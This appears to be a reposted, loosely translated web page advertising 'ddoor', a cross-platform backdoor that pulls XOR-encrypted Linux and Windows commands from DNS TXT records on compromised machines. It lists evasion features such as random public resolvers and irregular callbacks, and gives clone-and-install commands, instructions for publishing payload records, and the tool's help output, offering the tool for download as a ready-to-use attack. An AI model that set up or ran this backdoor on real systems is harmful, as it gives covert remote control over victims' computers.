The ddoor is a light cross-platform script, which uses dns .txt files to run orders on contaminated machinery.
Specifications
- Allows a txt record to have separate commands for both Linux and Windows computers
- List of about 10 public DNS servers from which to randomly select the one to use
- Return connection at unforeseen times
- Encrypts txt files using xor with a custom password
Installation
git clone https://github.com/rek7/ddoor.git pip3 install -r requirements.txt
Use
Run the payload_manager.py file with python3 to create an encrypted payload, and then update or create a txt record for access. Make sure the TTL is set to 300 seconds !!!
$ ./payload_manager.py -h @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@! @@@ @@! @@@ @@! @@@ @@! @@@ @@! @@@ !@! @!@ !@! @!@ !@! @!@ !@! @!@ !@! @!@ @!@ !@! @!@ !@! @!@ !@! @!@ !@! @!@!!@! !@! !!! !@! !!! !@! !!! !@! !!! !!@!@! !!: !!! !!: !!! !!: !!! !!: !!! !!::!! :!: !:! :!: !:! :!: !:! :!: !:! :!: !:! :::: :: :::: :: ::::: :: ::::: :: :: ::: :: : : :: : : : : : : : : : : : usage: payload_manager.py [-h] [-l LINUX_CMD] [-w WINDOWS_CMD] [-d DOMAIN_SEARCH] ddoor, crossplatform dns backdoor optional arguments: -h, --help show this help message and exit -l LINUX_CMD Linux Command -w WINDOWS_CMD Windows Command -d DOMAIN_SEARCH Domain to Check Commands On
Application snapshots
You can download the program from here.